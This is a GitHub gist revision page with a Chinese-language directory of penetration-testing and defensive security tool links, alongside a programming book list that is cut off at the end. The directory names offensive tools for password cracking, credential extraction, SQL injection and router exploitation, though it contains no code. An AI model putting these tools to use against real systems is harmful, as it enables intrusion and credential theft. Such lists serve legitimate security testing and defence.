Revisions
-
ckeyer revised this gist
Apr 26, 2018 . 1 changed file with 208 additions and 189 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,189 +1,208 @@ ### 入门指南 * https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版 * https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版 * https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版 * https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版 * https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门 * https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南 * http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用 * https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表 * https://sec-wiki.com/ sec-wiki安全维基百科 ### fuzz工具收集 * https://github.com/ivanfratric/winafl * https://github.com/attekett/NodeFuzz * https://github.com/google/oss-fuzz * http://blog.topsec.com.cn/ad_lab/alphafuzzer/ * http://llvm.org/docs/LibFuzzer.html ### 子域名枚举 * https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本) * https://github.com/ring04h/wydomain (子域名字典穷举) * https://github.com/le4f/dnsmaper (子域名枚举与地图标记) * https://github.com/0xbug/orangescan (在线子域名信息收集工具) * https://github.com/TheRook/subbrute (根据DNS记录查询子域名) * https://github.com/We5ter/GSDF (基于谷歌SSL透明证书的子域名查询脚本) * https://github.com/mandatoryprogrammer/cloudflare_enum (使用CloudFlare进行子域名枚举的脚本) * https://github.com/18F/domain-scan (A domain scanner) * https://github.com/guelfoweb/knock (Knock Subdomain Scan) * https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (多方式收集目标子域名信息) * https://github.com/code-scan/BroDomain (兄弟域名查询) * https://github.com/chuhades/dnsbrute (基于dns查询的子域名枚举) ### web应用扫描器 * http://github.com/Arachni/arachni (web应用安全扫描器框架 http://www.arachni-scanner.com) ### 数据库扫描、注入工具 * https://github.com/sqlmapproject/sqlmap (注入工具之王sqlmap) * https://github.com/0xbug/SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具) * https://github.com/stamparm/DSSS (99行代码实现的sql注入漏洞扫描器) * https://github.com/youngyangyang04/NoSQLAttack (一款针对mongoDB的攻击工具) * https://github.com/Neohapsis/bbqsql (SQL盲注利用框架) * https://github.com/NetSPI/PowerUpSQL (攻击SQLSERVER的Powershell脚本框架) * https://github.com/WhitewidowScanner/whitewidow (又一款数据库扫描器) * https://github.com/stampery/mongoaudit (MongoDB审计及渗透工具) * https://github.com/commixproject/commix (注入点命令执行利用工具) ### 弱口令或信息泄漏扫描 * https://github.com/lijiejie/htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本) * https://github.com/lijiejie/BBScan (一个迷你的信息泄漏批量扫描脚本) * https://github.com/lijiejie/GitHack (.git文件夹泄漏利用工具) * https://github.com/LoRexxar/BScanner (基于字典的目录扫描小工具) * https://github.com/she11c0der/fenghuangscanner_v3 (各种端口及弱口令检测,作者wilson9x1,原地址失效) * https://github.com/ysrc/F-Scrack (对各类服务进行弱口令检测的脚本) * https://github.com/Mebus/cupp (根据用户习惯生成弱口令探测字典脚本) * https://github.com/RicterZ/genpAss (中国特色的弱口令生成器) * https://github.com/netxfly/crack_ssh (go写的协程版的ssh\redis\mongodb弱口令破解工具) * https://github.com/n0tr00t/Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息) * https://github.com/repoog/GitPrey (GitHub敏感信息扫描工具) * https://github.com/dxa4481/truffleHog (GitHub敏感信息扫描工具,包括检测commit等) * https://github.com/LandGrey/pydictor (暴力破解字典建立工具) * https://github.com/GDSSecurity/xxe-recursive-download (xxe漏洞递归下载工具) * https://buer.haus/xxegen/ (xxe在线生成利用工具) ### 物联网设备扫描 * https://github.com/rapid7/IoTSeeker (物联网设备默认密码扫描检测工具) * https://github.com/shodan-labs/iotdb (使用nmap扫描IoT设备) * https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用) * https://github.com/reverse-shell/routersploit (路由器漏洞利用框架) * https://github.com/scu-igroup/telnet-scanner (telnet服务密码撞库) * https://github.com/RUB-NDS/PRET (打印机攻击框架) ### XSS扫描 * https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer) * https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing) * https://github.com/0x584A/fuzzXssPHP (PHP版本的反射型xss扫描) * https://github.com/chuhades/xss_scan (批量扫描xss的python脚本) * https://github.com/BlackHole1/autoFindXssAndCsrf (自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件) ### 企业网络自检 * https://github.com/sowish/LNScan (详细的内部网络信息扫描器) * https://github.com/SkyLined/LocalNetworkScanner (javascript实现的本地网络扫描器) * https://github.com/ysrc/xunfeng (网络资产识别引擎,漏洞检测引擎) * https://github.com/laramies/theHarvester (企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts) * https://github.com/x0day/Multisearch-v2 (搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息) ### webshell检测以及病毒分析工具 * https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (简单的php后门检测工具以及webshell样本库) * https://github.com/ym2011/ScanBackdoor (Webshell扫描工具) * https://github.com/yassineaddi/BackdoorMan (PHP后门扫描) * https://github.com/he1m4n6a/findWebshell (又一款webshell检测工具) * https://github.com/Tencent/HaboMalHunter (哈勃分析系统,linux系统病毒分析及安全检测) * https://github.com/PlagueScanner/PlagueScanner (使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎) * https://github.com/nbs-system/php-malware-finder (一款高效率PHP-webshell扫描工具) * https://github.com/emposha/PHP-Shell-Detector/ (测试效率高达99%的webshell检测工具) ### 内网安全渗透测试工具集 * https://github.com/0xwindows/VulScritp (企业内网渗透脚本,包括banner扫描、端口扫描;各种通用漏洞利用等) * https://github.com/lcatro/network_backdoor_scanner (基于网络流量的内网探测框架) * https://github.com/fdiskyou/hunter (调用 Windows API 枚举用户登录信息) * https://github.com/BlackHole1/WebRtcXSS (自动化利用XSS入侵内网) * https://github.com/AlessandroZ/LaZagne (本机密码查看提取工具) * https://github.com/huntergregal/mimipenguin (linux密码抓取神器) ### 端口扫描、指纹识别以及中间件扫描 * https://nmap.org/download.html (Nmap端口扫描器之王,https://svn.nmap.org/) * https://github.com/ring04h/wyportmap (目标端口扫描+系统服务指纹识别) * https://github.com/ring04h/weakfilescan (动态多线程敏感信息泄露检测工具) * https://github.com/EnableSecurity/wafw00f (WAF产品指纹识别) * https://github.com/rbsec/sslscan (ssl类型识别) * https://github.com/urbanadventurer/whatweb (web指纹识别) * https://github.com/tanjiti/FingerPrint (web应用指纹识别) * https://github.com/nanshihui/Scan-T (网络爬虫式指纹识别) * https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap) * https://github.com/ywolf/F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描,端口指纹服务识别) * https://github.com/ywolf/F-MiddlewareScan (中间件扫描) * https://github.com/maurosoria/dirsearch (Web path scanner) * https://github.com/x0day/bannerscan (C段Banner与路径扫描) * https://github.com/RASSec/RASscan (端口服务扫描) * https://github.com/3xp10it/bypass_waf (waf自动暴破) * https://github.com/3xp10it/xcdn (尝试找出cdn背后的真实ip) * https://github.com/Xyntax/BingC (基于Bing搜索引擎的C段/旁站查询,多线程,支持API) * https://github.com/Xyntax/DirBrute (多线程WEB目录爆破工具) * https://github.com/zer0h/httpscan (一个爬虫式的网段Web主机发现小工具) * https://github.com/lietdai/doom (thorn上实现的分布式任务分发的ip端口漏洞扫描器) * https://github.com/chichou/grab.js (类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议) * https://github.com/Nitr4x/whichCDN (CDN识别、检测) * https://github.com/secfree/bcrpscan (基于爬虫的web路径扫描器) ### 针对性漏洞测试工具 * https://github.com/brianwrf/hackUtils (java反序列化利用工具集) * https://github.com/frohoff/ysoserial ( java反序列化利用工具) * https://github.com/blackye/Jenkins (Jenkins漏洞探测、用户抓取爆破) * https://github.com/code-scan/dzscan (discuz漏洞扫描) * https://github.com/chuhades/CMS-Exploit-Framework (CMS攻击框架) * https://github.com/lijiejie/IIS_shortname_Scanner (IIS短文件名漏洞扫描) * https://github.com/riusksk/FlashScanner (flashxss扫描) * https://github.com/coffeehb/SSTIF (服务器端模板注入漏洞的半自动化工具) * https://github.com/epinna/tplmap (服务器端模板注入漏洞检测与利用工具) * https://github.com/cr0hn/dockerscan (docker扫描工具) * https://github.com/GoSecure/break-fast-serial (借助DNS解析来检测Java反序列化漏洞工具) * https://github.com/dirtycow/dirtycow.github.io (脏牛提权漏洞exp) ### 无线网络渗透、扫描 * https://github.com/savio-code/fern-wifi-cracker/ (无线安全审计工具) * https://github.com/m4n3dw0lf/PytheM (Python网络/渗透测试工具) * https://github.com/P0cL4bs/WiFi-Pumpkin (无线安全渗透测试套件) ### 代码静态扫描、代码运行栈跟踪 * https://github.com/exakat/php-static-analysis-tools (php静态扫描工具集) * https://github.com/wufeifei/cobra (白盒代码安全审计系统) * https://github.com/OneSourceCat/phpvulhunter (静态php代码审计) * https://github.com/Qihoo360/phptrace (跟踪、分析PHP运行情况的工具) * https://github.com/ajinabraham/NodeJsScan (NodeJS应用代码审计) * https://github.com/pwnsdx/BadCode (PHP代码审计) * https://github.com/thesp0nge/dawnscanner (ruby源码审计) * https://github.com/presidentbeef/brakeman (Ruby on Rails应用程序的安全漏洞) * https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app黑盒审计) * https://github.com/alibaba/iOSSecAudit (iOS安全审计) ### 模块化扫描、综合扫描器 * https://github.com/az0ne/AZScanner (自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测) * https://github.com/blackye/lalascan (分布式web漏洞扫描框架,集合owasp top10漏洞扫描和边界资产发现能力) * https://github.com/blackye/BkScanner (BkScanner 分布式、插件化web漏洞扫描器) * https://github.com/ysrc/GourdScanV2 (被动式漏洞扫描) * https://github.com/alpha1e0/pentestdb (WEB渗透测试数据库) * https://github.com/netxfly/passive_scan (基于http代理的web漏洞扫描器) * https://github.com/1N3/Sn1per (自动化扫描器,包括中间件扫描以及设备指纹识别) * https://github.com/RASSec/pentestEr_Fully-automatic-scanner (定向全自动化渗透测试工具) * https://github.com/3xp10it/3xp10it (自动化渗透测试框架) * https://github.com/Lcys/lcyscan (扫描效果未验证) * https://github.com/Xyntax/POC-T (渗透测试插件化并发框架) * https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns) * https://github.com/Skycrab/leakScan (web端的在线漏洞扫描) * https://github.com/zhangzhenfeng/AnyScan (开发中…) ### Android系列工具: * http://sec-redclub.com/index.php/archives/439/ ### DDOS防护: * https://github.com/ywjt/Dshield ### Database firewall: * https://nim4.github.io/DBShield/ ### waf开源及规则: * https://github.com/xsec-lab/x-waf * https://github.com/loveshell/ngx_lua_waf * https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules -
Apr 17, 2018 . 3 changed files with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes.File renamed without changes.File renamed without changes. -
Apr 17, 2018 . 1 changed file with 253 additions and 0 deletions.There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,253 @@ # 经典编程书籍大全 100+ 经典技术书籍,涵盖:计算机系统与网络、系统架构、算法与数据结构、前端开发、后端开发、移动开发、数据库、测试、项目与团队、程序员职业修炼、求职面试 和 编程相关的经典书籍。 这个列表综合了伯乐在线网站以往推荐[经典书籍](http://blog.jobbole.com/tag/book/)文章中的列表,以及在微信和微博中被广泛推荐的好书。虽然已经包括了100多本,覆盖的面也比较全。仍然有很多方面需要补充,而且相信还有很多没有被收录的好书。欢迎大家在 issues 中推荐或自荐。 ## 计算机系统与网络 * 《[图灵的秘密:他的生平、思想及论文解读](https://www.amazon.cn/gp/product/B00AAQXKXS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AAQXKXS&linkCode=as2&tag=vastwork-23)》 * 《[计算机系统概论](https://www.amazon.cn/gp/product/B0011F9OQE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F9OQE&linkCode=as2&tag=vastwork-23)》 * 《[深入理解Linux内核](https://www.amazon.cn/gp/product/B0011F5RYM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F5RYM&linkCode=as2&tag=vastwork-23)》 * 《[深入Linux内核架构](https://www.amazon.cn/gp/product/B003QN7J7U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003QN7J7U&linkCode=as2&tag=vastwork-23)》 * 《[TCP/IP详解 卷1:协议](https://www.amazon.cn/gp/product/B00116OTVS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00116OTVS&linkCode=as2&tag=vastwork-23)》 * 《[Linux系统编程(第2版)](https://www.amazon.cn/gp/product/B00JUM2ML4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JUM2ML4&linkCode=as2&tag=vastwork-23)》 * 《[Linux内核设计与实现(第3版)](https://www.amazon.cn/gp/product/B004X3Z3D4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004X3Z3D4&linkCode=as2&tag=vastwork-23)》 * 《[深入理解计算机系统(原书第2版)](https://www.amazon.cn/gp/product/B004BJ18KM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004BJ18KM&linkCode=as2&tag=vastwork-23)》 * 《[计算机程序的构造和解释(原书第2版)](https://www.amazon.cn/gp/product/B0011AP7RY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011AP7RY&linkCode=as2&tag=vastwork-23)》 * 《[编码:隐匿在计算机软硬件背后的语言](https://www.amazon.cn/gp/product/B009RSXIB4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B009RSXIB4&linkCode=as2&tag=vastwork-23)》 * 《[性能之颠:洞悉系统、企业与云计算](https://www.amazon.cn/gp/product/B0140I5WPK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0140I5WPK&linkCode=as2&tag=vastwork-23)》 * 《[UNIX网络编程 卷1:套接字联网API(第3版)](https://www.amazon.cn/gp/product/B011S72JB6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011S72JB6&linkCode=as2&tag=vastwork-23)》 * 《[UNIX网络编程 卷2:进程间通信](https://www.amazon.cn/gp/product/B012R5A29O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B012R5A29O&linkCode=as2&tag=vastwork-23)》 * 《[Windows核心编程(第5版)](https://www.amazon.cn/gp/product/B001GS7918/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001GS7918&linkCode=as2&tag=vastwork-23)》 * 《[WireShark网络分析就这么简单](https://www.amazon.cn/gp/product/B00PB5QQ84/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PB5QQ84&linkCode=as2&tag=vastwork-23)》 * 《[WireShark网络分析的艺术](https://www.amazon.cn/gp/product/B01AS1OS8A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01AS1OS8A&linkCode=as2&tag=vastwork-23)》 ## 编程通用 * 《[编程原本](https://www.amazon.cn/gp/product/B006P7V73G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B006P7V73G&linkCode=as2&tag=vastwork-23)》 * 《[代码大全](https://www.amazon.cn/gp/product/B0061XKRXA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0061XKRXA&linkCode=as2&tag=vastwork-23)》 * 《[UNIX编程艺术](https://www.amazon.cn/gp/product/B008Z1IEQ8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008Z1IEQ8&linkCode=as2&tag=vastwork-23)》 * 《[代码整洁之道](https://www.amazon.cn/gp/product/B0031M9GHC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0031M9GHC&linkCode=as2&tag=vastwork-23)》 * 《[编程珠玑(第2版)](https://www.amazon.cn/gp/product/B00SFZH0DC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00SFZH0DC&linkCode=as2&tag=vastwork-23)》 * 《[编程珠玑(续)](https://www.amazon.cn/gp/product/B0150BMQDM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0150BMQDM&linkCode=as2&tag=vastwork-23)》 * 《[软件调试的艺术](https://www.amazon.cn/gp/product/B00IOAM6VE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00IOAM6VE&linkCode=as2&tag=vastwork-23)》 * 《[修改代码的艺术](https://www.amazon.cn/gp/product/B00KMJ2Q1U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KMJ2Q1U&linkCode=as2&tag=vastwork-23)》 * 《[编程语言实现模式](https://www.amazon.cn/gp/product/B007HYMPBY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007HYMPBY&linkCode=as2&tag=vastwork-23)》 * 《[编写可读代码的艺术](https://www.amazon.cn/gp/product/B008B4DTG4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008B4DTG4&linkCode=as2&tag=vastwork-23)》 * 《解析极限编程:拥抱变化》 * 《[精通正则表达式(第3版)](https://www.amazon.cn/gp/product/B008UCHA58/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008UCHA58&linkCode=as2&tag=vastwork-23)》 * 《[编译原理(第2版)](https://www.amazon.cn/gp/product/B001NGO85I/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001NGO85I&linkCode=as2&tag=vastwork-23)》龙书 * 《[重构:改善既有代码的设计](https://www.amazon.cn/gp/product/B011LPUB42/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011LPUB42&linkCode=as2&tag=vastwork-23)》 * 《[七周七语言:理解多种编程范型](https://www.amazon.cn/gp/product/B00ALPRM3M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRM3M&linkCode=as2&tag=vastwork-23)》 * 《[调试九法:软硬件错误的排查之道](https://www.amazon.cn/gp/product/B00CBBLUFK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBLUFK&linkCode=as2&tag=vastwork-23)》 * 《程序设计语言:实践之路(第3版)》 * 《[计算的本质:深入剖析程序和计算机](https://www.amazon.cn/gp/product/B00PG0MM3C/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PG0MM3C&linkCode=as2&tag=vastwork-23)》 * 《[设计模式 : 可复用面向对象软件的基础](https://www.amazon.cn/gp/product/B001130JN8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001130JN8&linkCode=as2&tag=vastwork-23)》 ## 算法与数据结构 * 《[算法(第4版)](https://www.amazon.cn/gp/product/B009OCFQ0O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B009OCFQ0O&linkCode=as2&tag=vastwork-23)》 * 《[算法导论(原书第2版)](https://www.amazon.cn/gp/product/B00AK7BYJY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AK7BYJY&linkCode=as2&tag=vastwork-23)》 * 《[Python算法教程](https://www.amazon.cn/gp/product/B019NB0VCI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B019NB0VCI&linkCode=as2&tag=vastwork-23)》 * 《[算法设计与分析基础(第3版)](https://www.amazon.cn/gp/product/B00S4HCQUI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00S4HCQUI&linkCode=as2&tag=vastwork-23)》 * 《[学习 JavaScript 数据结构与算法](https://www.amazon.cn/gp/product/B016DWSF8M/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B016DWSF8M&linkCode=as2&tag=vastwork-23)》 * 《[数据结构与算法分析 : C++描述(第4版)](https://www.amazon.cn/gp/product/B01LDG2DSG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LDG2DSG&linkCode=as2&tag=vastwork-23)》 * 《[数据结构与算法分析 : C语言描述(第2版)](https://www.amazon.cn/gp/product/B002WC7NGS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B002WC7NGS&linkCode=as2&tag=vastwork-23)》 * 《[数据结构与算法分析 : Java语言描述(第2版)](https://www.amazon.cn/gp/product/B01CNP0CG6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01CNP0CG6&linkCode=as2&tag=vastwork-23)》 ## 职业修炼与规划 * 《[大教堂与集市](https://www.amazon.cn/gp/product/B00KQDTZ4S/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00KQDTZ4S&linkCode=as2&tag=vastwork-23)》 * 《卓有成效的程序员》 * 《[程序员的职业素养](https://www.amazon.cn/gp/product/B01LZJ8L9J/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01LZJ8L9J&linkCode=as2&tag=vastwork-23)》 * 《[程序员修炼之道:从小工到专家](https://www.amazon.cn/gp/product/B004GV08CY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004GV08CY&linkCode=as2&tag=vastwork-23)》 * 《[软件开发者路线图:从学徒到高手](https://www.amazon.cn/gp/product/B00H6X6LD4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00H6X6LD4&linkCode=as2&tag=vastwork-23)》 * 《[我编程,我快乐: 程序员职业规划之道](https://www.amazon.cn/gp/product/B00CBBKDGM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CBBKDGM&linkCode=as2&tag=vastwork-23)》 * 《[程序员的思维修炼:开发认知潜能的九堂课](https://www.amazon.cn/gp/product/B007VARUIM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007VARUIM&linkCode=as2&tag=vastwork-23)》 * 《[高效程序员的45个习惯:敏捷开发修炼之道(修订版)](https://www.amazon.cn/gp/product/B00OA9L3NU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00OA9L3NU&linkCode=as2&tag=vastwork-23)》 ## 大师访谈 * 《[编程大师智慧](https://www.amazon.cn/gp/product/B00451BP72/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00451BP72&linkCode=as2&tag=vastwork-23)》 * 《[编程大师访谈录](https://www.amazon.cn/gp/product/B00ALPRKMA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00ALPRKMA&linkCode=as2&tag=vastwork-23)》 * 《[编程人生 : 15位软件先驱访谈录](https://www.amazon.cn/gp/product/B00QA7GA2Y/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00QA7GA2Y&linkCode=as2&tag=vastwork-23)》 * 《[奇思妙想 : 15位计算机天才及其重大发现](https://www.amazon.cn/gp/product/B007ED88CI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B007ED88CI&linkCode=as2&tag=vastwork-23)》 * 《[图灵和ACM图灵奖](https://www.amazon.cn/gp/product/B008G80O9K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008G80O9K&linkCode=as2&tag=vastwork-23)》 ## 架构/性能 * 《[微服务设计](https://www.amazon.cn/gp/product/B01ER75V6O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01ER75V6O&linkCode=as2&tag=vastwork-23)》 * 《[大数据日知录](https://www.amazon.cn/gp/product/B00NGW4EAG/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00NGW4EAG&linkCode=as2&tag=vastwork-23)》 * 《[企业应用架构模式](https://www.amazon.cn/gp/product/B003LBSRDM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003LBSRDM&linkCode=as2&tag=vastwork-23)》 * 《[Web性能权威指南](https://www.amazon.cn/gp/product/B00JMKWHFU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JMKWHFU&linkCode=as2&tag=vastwork-23)》 * 《[SRE:Google运维解密](https://www.amazon.cn/gp/product/B01M0EHQ43/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01M0EHQ43&linkCode=as2&tag=vastwork-23)》 * 《[发布!软件的设计与部署](https://www.amazon.cn/gp/product/B0153178XM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0153178XM&linkCode=as2&tag=vastwork-23)》 * 《[高扩展性网站的 50 条原则](https://www.amazon.cn/gp/product/B01HZFHQQI/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01HZFHQQI&linkCode=as2&tag=vastwork-23)》 * 《[大型网站技术架构:核心原理与案例分析](https://www.amazon.cn/gp/product/B00F3Z26G8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00F3Z26G8&linkCode=as2&tag=vastwork-23)》 * 《[恰如其分的软件架构:风险驱动的设计方法](https://www.amazon.cn/gp/product/B00EP6TGAU/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00EP6TGAU&linkCode=as2&tag=vastwork-23)》 * 《[软件系统架构:使用视点和视角与利益相关者合作(第2版)](https://www.amazon.cn/gp/product/B00CMMUXC4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00CMMUXC4&linkCode=as2&tag=vastwork-23)》 ## Web前端 * 《[高性能 JavaScript](https://www.amazon.cn/gp/product/B013SGB2AO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B013SGB2AO&linkCode=as2&tag=vastwork-23)》 * 《[锋利的 jQuery(第2版)](https://www.amazon.cn/gp/product/B0089TDFNS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0089TDFNS&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript 忍者秘籍](https://www.amazon.cn/gp/product/B016DWSEWO/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B016DWSEWO&linkCode=as2&tag=vastwork-23)》(感谢[@joker-danta](https://github.com/jobbole/awesome-programming-books/issues?q=is%3Aissue+is%3Aopen+author%3Ajoker-danta) 补充推荐) * 《[编写可维护的 JavaScript](https://www.amazon.cn/gp/product/B00BQ7RMW0/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00BQ7RMW0&linkCode=as2&tag=vastwork-23)》 * 《[你不知道的 JavaScript(上)](https://www.amazon.cn/gp/product/B00W34DZ8K/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00W34DZ8K&linkCode=as2&tag=vastwork-23)》 * 《[JavaScript 